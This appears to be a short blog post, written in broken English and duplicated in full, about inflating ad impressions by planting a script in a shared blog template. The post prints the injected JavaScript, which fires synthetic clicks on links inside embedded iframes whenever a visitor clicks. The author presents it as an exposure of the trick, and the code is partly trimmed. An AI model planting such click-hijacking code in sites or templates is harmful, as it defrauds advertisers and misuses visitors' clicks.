Hi all, just my note about someone who make cheat to gain impression with blackhat technique.
how it impression blackhat works
adding bad script on template.
well, let see this transaction : someone can change one node of this template to call his node (web or other script), it means for every template that downloaded by people will automatically gain his impression.
execute some script to call other external script
let see this script that loaded on template: (this is just an example that i found, some lines was deleted for security reason)on this script, someone want to do something when user do something.
<script type='text/javascript'>
function fireEvent(element,event) {
if (document.createEvent) {
var evt = document.createEvent('HTMLEvents');
evt.initEvent(event, true, true );
return !element.dispatchEvent(evt);
} else {
var evt = document.createEventObject();
return element.fireEvent('on'+event,evt)
}
}
function logIt() {
var randp = Math.floor(Math.random()*2);
var i = document.getElementsByTagName("iframe");
var iframe = i[randp];
var iframeDoc = iframe.contentDocument || iframe.contentWindow.document;
var a = iframeDoc.getElementsByTagName("a");
var elem = a.item(randp);
if(elem != null) {
if(elem.createTextRange) {
var range = elem.createTextRange();
range.move('character', caretPos);
range.select();
}
else {
if(elem.selectionStart) {
elem.setSelectionRange(caretPos, caretPos);
fireEvent(elem, 'click');
elem.focus();
}
}
}
}
</script>
expr:onclick='"logIt()"'
..show all:.
.
Hi all, just my note about someone who make cheat to gain impression with blackhat technique.
how it impression blackhat works
adding bad script on template.
well, let see this transaction : someone can change one node of this template to call his node (web or other script), it means for every template that downloaded by people will automatically gain his impression.execute some script to call other external script
let see this script that loaded on template: (this is just an example that i found, some lines was deleted for security reason)on this script, someone want to do something when user do something.
<script type='text/javascript'>
function fireEvent(element,event) {
if (document.createEvent) {
var evt = document.createEvent('HTMLEvents');
evt.initEvent(event, true, true );
return !element.dispatchEvent(evt);
} else {
var evt = document.createEventObject();
return element.fireEvent('on'+event,evt)
}
}
function logIt() {
var randp = Math.floor(Math.random()*2);
var i = document.getElementsByTagName("iframe");
var iframe = i[randp];
var iframeDoc = iframe.contentDocument || iframe.contentWindow.document;
var a = iframeDoc.getElementsByTagName("a");
var elem = a.item(randp);
if(elem != null) {
if(elem.createTextRange) {
var range = elem.createTextRange();
range.move('character', caretPos);
range.select();
}
else {
if(elem.selectionStart) {
elem.setSelectionRange(caretPos, caretPos);
fireEvent(elem, 'click');
elem.focus();
}
}
}
}
</script>
expr:onclick='"logIt()"'
No comments:
Post a Comment